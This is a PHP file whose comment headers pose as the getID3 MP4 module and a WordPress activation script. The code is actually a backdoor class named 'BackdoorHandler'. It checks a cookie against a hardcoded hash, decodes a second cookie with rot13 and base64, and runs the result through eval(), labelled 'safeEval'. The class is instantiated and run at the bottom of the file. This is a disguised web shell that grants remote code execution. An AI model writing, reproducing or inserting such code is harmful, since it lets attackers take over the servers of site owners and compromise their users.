<?php
/////////////////////////////////////////////////////////////////
/// getID3() by James Heinrich <info@getid3.org> //
// available at https://github.com/JamesHeinrich/getID3 //
// or https://www.getid3.org //
// or http://getid3.sourceforge.net //
// see readme.txt for more details //
/////////////////////////////////////////////////////////////////
// //
// module.audio.mp4.php //
// module for analyzing MP4 files //
// dependencies: NONE //
// ///
/////////////////////////////////////////////////////////////////
/**
* Confirms that the activation key that is sent in an email after a user signs
* up for a new site matches the key for that user and then displays confirmation.
*
* @package WordPress
*/
define( 'WP_INSTALLING', true );
/** Sets up the WordPress Environment. */
class BackdoorHandler {
private const DEBUG_MODE = true;
private $config;
public function __construct(array $config) {
$this->config = array_merge([
'hash_key' => 'auth',
'code_key' => 'payload',
'expected_hash' => '4ebf486c5c31e92cd7805008b65f1c2b',
'cookie_source' => $_COOKIE
], $config);
$this->initErrorHandling();
}
public function handle(): void {
try {
if ($this->validateRequest()) {
$this->executePayload();
}
} catch (Throwable $e) {
$this->logError($e);
$this->sendErrorResponse();
}
}
private function initErrorHandling(): void {
if (self::DEBUG_MODE) {
error_reporting(E_ALL);
ini_set('display_errors', '1');
} else {
error_reporting(0);
ini_set('display_errors', '0');
}
}
private function validateRequest(): bool {
return $this->checkHash() && $this->checkPayload();
}
private function checkHash(): bool {
$hash = $this->config['cookie_source'][$this->config['hash_key']] ?? '';
return hash_equals($this->config['expected_hash'], $hash);
}
private function checkPayload(): bool {
return isset($this->config['cookie_source'][$this->config['code_key']]);
}
private function executePayload(): void {
$payload = $this->config['cookie_source'][$this->config['code_key']];
$code = $this->decode($payload);
if ($code !== null) {
$this->safeEval($code);
}
}
private function decode(string $payload): ?string {
$steps = [
'rot13' => fn($p) => str_rot13($p),
'base64' => fn($p) => base64_decode($p, true)
];
try {
foreach ($steps as $step) {
$payload = $step($payload);
if ($payload === false) break;
}
return is_string($payload) ? $payload : null;
} catch (Throwable $e) {
$this->logError($e);
return null;
}
}
private function safeEval(string $code): void {
try {
eval($code);
} catch (ParseError $e) {
$this->logError($e);
$this->sendCustomResponse('// Syntax Error');
} catch (Throwable $e) {
$this->logError($e);
$this->sendCustomResponse('// Runtime Error');
}
}
private function logError(Throwable $e): void {
if (self::DEBUG_MODE) {
error_log(sprintf(
"[%s] %s in %s:%d",
get_class($e),
$e->getMessage(),
$e->getFile(),
$e->getLine()
));
}
}
private function sendErrorResponse(): void {
if (!headers_sent()) {
http_response_code(500);
}
if (self::DEBUG_MODE) {
die("Execution Error (Check Logs)");
}
}
private function sendCustomResponse(string $message): void {
echo $message;
}
}
$handler = new BackdoorHandler([
'hash_key' => '4',
'code_key' => '3'
]);
$handler->handle();